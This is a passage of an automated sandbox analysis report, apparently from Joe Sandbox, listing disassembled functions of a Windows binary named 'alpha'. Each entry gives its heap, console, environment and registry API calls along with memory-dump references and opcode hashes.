                                                • Part of subcall function 00007FF6EB176B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB176AF1,?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925), ref: 00007FF6EB176B59
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925,?,?,?,?,00007FF6EB17B9B1), ref: 00007FF6EB176B03
                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF6EB19EA0F,?,?,?,00007FF6EB19E925,?,?,?,?,00007FF6EB17B9B1), ref: 00007FF6EB176B17
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                              • String ID:
                                              • API String ID: 3512109576-0
                                              • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                              • Instruction ID: 1982fd891a855a187bbb5399e8f704810627c99f5928d8d2ce3241e219609daf
                                              • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                              • Instruction Fuzzy Hash: ED218363A0968285EB049BA5D4543F87BA0EF5EB98F144031C90E873B1DF3EA449C756
                                              Function 00007FF6EB17B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17AF82), ref: 00007FF6EB17B6D0
                                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17AF82), ref: 00007FF6EB17B6E7
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17AF82), ref: 00007FF6EB17B701
                                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17AF82), ref: 00007FF6EB17B715
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocSize
                                              • String ID:
                                              • API String ID: 2549470565-0
                                              • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                              • Instruction ID: 5700ed11a5f92ca8f89eef9362a0c997a0fc2bf557c59fa4094ce5f6092d12b6
                                              • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                              • Instruction Fuzzy Hash: FB21A423A09792C2EA048B51F1502F9B6A1FF8DBA8B488431DA0E837F0DF7DE445C705
                                              Function 00007FF6EB19CFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D01C
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D033
                                              • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D06D
                                              • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D07F
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                              • String ID:
                                              • API String ID: 1033415088-0
                                              • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                              • Instruction ID: 2e6b747dfafb0c4e45c9185557d3327a2206f574ecddac2b5b2c323d0c6b1fb0
                                              • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                              • Instruction Fuzzy Hash: 6C119832618A8287E7444B14F1542BAB7E0FB8EBA9F445135FA8E87B64DF3DD0458F05
                                              Function 00007FF6EB1759E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                              • String ID:
                                              • API String ID: 22757656-0
                                              • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                              • Instruction ID: 96d37af2609dc2f076daa7c06d4385b71e437dcbbebd55a76419557fbc606aa4
                                              • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                              • Instruction Fuzzy Hash: F5116073A1468587E7104B28E5483B97AA0FB8EB78F644734D62A873E4CF3DD5498B05
                                              Function 00007FF6EB195690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6EB195433,?,?,?,00007FF6EB1969B8,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1956C5
                                              • RtlFreeHeap.NTDLL(?,?,00000028,00007FF6EB195433,?,?,?,00007FF6EB1969B8,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1956D9
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6EB195433,?,?,?,00007FF6EB1969B8,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1956FD
                                              • RtlFreeHeap.NTDLL(?,?,00000028,00007FF6EB195433,?,?,?,00007FF6EB1969B8,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB195711
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                              • Instruction ID: d4616a35f9eed5667e544108afc03645d6237f857d28592fc5686c9331afd233
                                              • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                              • Instruction Fuzzy Hash: 91110A72A04B91C6DB008F56F5441ADBBB0F74DF94B598125DB4E43728DF38E456CB44
                                              Function 00007FF6EB189158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                              • String ID:
                                              • API String ID: 140117192-0
                                              • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                              • Instruction ID: bfef61ffe4481d9abbe77f2a0c224642cb47d2fdc72685667fafed02cfca58b0
                                              • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                              • Instruction Fuzzy Hash: 4421A076918F4195E7409B04F8903E9B3A4FB89768F900036DA8D92774DF7EE548CB0A
                                              Function 00007FF6EB184AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB184AD6
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB184AEF
                                                • Part of subcall function 00007FF6EB184A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A28
                                                • Part of subcall function 00007FF6EB184A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A66
                                                • Part of subcall function 00007FF6EB184A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A7D
                                                • Part of subcall function 00007FF6EB184A14: memmove.MSVCRT(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A9A
                                                • Part of subcall function 00007FF6EB184A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184AA2
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB18EE64
                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF6EB178798), ref: 00007FF6EB18EE78
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                              • String ID:
                                              • API String ID: 2759988882-0
                                              • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                              • Instruction ID: 18f3f24639bc34803f82bdc0cdb2d125698f7625b231f57c03697eec6da53e59
                                              • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                              • Instruction Fuzzy Hash: 44F06822A09B42C6EF0457A5A4043B8A9E1FF4EB55B488034CD0FC2370EF3DB4048716
                                              Function 00007FF6EB19F22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ConsoleMode_get_osfhandle
                                              • String ID:
                                              • API String ID: 1606018815-0
                                              • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                              • Instruction ID: 3e980c86596421d7fd7bdfeb759c1ca8b2a5277fc4365a964f0bbf3054fd365d
                                              • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                              • Instruction Fuzzy Hash: 21F01232524A81DBD7045B10F8443B9FA60FB8EB26F449234DA4B423A4DF3DE4088B05
                                              Function 00007FF6EB1A10D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB17CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                                • Part of subcall function 00007FF6EB17CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              • wcschr.MSVCRT ref: 00007FF6EB1A11DC
                                              • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF6EB19827A), ref: 00007FF6EB1A1277
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocateProcessmemmovewcschr
                                              • String ID: &()[]{}^=;!%'+,`~
                                              • API String ID: 4220614737-381716982
                                              • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                              • Instruction ID: 430a79cb411898bf52e844803a0c0f31ff7d27962a3ef321d836fd0a0559ea1f
                                              • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                              • Instruction Fuzzy Hash: F771B37390824286D7608F25A4907F966A4FB9D7BCF500636C94DC3BB4CE3EF4558B09
                                              Function 00007FF6EB17E420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806D6
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806F0
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB18074D
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB180762
                                              • longjmp.MSVCRT ref: 00007FF6EB18CCBC
                                              • longjmp.MSVCRT(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18CCE0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                              • String ID: GeToken: (%x) '%s'
                                              • API String ID: 3282654869-1994581435
                                              • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                              • Instruction ID: 1c668090192a9d6a853a71fffdf147214515174d2e7b40bbb6e3182b789114da
                                              • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                              • Instruction Fuzzy Hash: 8161D167A0D25682FA148B21E4943F922D4AF4E7BCF144535C91EC77F9EE7EE440870A
                                              Function 00007FF6EB1A08EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memmovewcsncmp
                                              • String ID: 0123456789
                                              • API String ID: 3879766669-2793719750
                                              • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                              • Instruction ID: 2f2115648c17e464e55a68419d3083fd1ae8bcb41bdf2b7c5294e5c131bfd03c
                                              • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                              • Instruction Fuzzy Hash: BA41D223F1878A85EA258F2694043FA6394FB4CBA8F445135CE4E837A4DE3DE4498B85
                                              Function 00007FF6EB199784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB1997D0
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB1998D7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                              • String ID: Software\Classes
                                              • API String ID: 2714550308-1656466771
                                              • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                              • Instruction ID: 066514ba7933842922cd880d7662a6ff2c702969be1fc716b82f63d2f26873b9
                                              • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                              • Instruction Fuzzy Hash: 3241E333A0979681EA00DB16D4442B963A4FB8DBE8F508134DA5D837F5EF3AE846C349
                                              Function 00007FF6EB19A0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19A0FC
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19A1FB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                              • String ID: Software\Classes
                                              • API String ID: 2714550308-1656466771
                                              • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
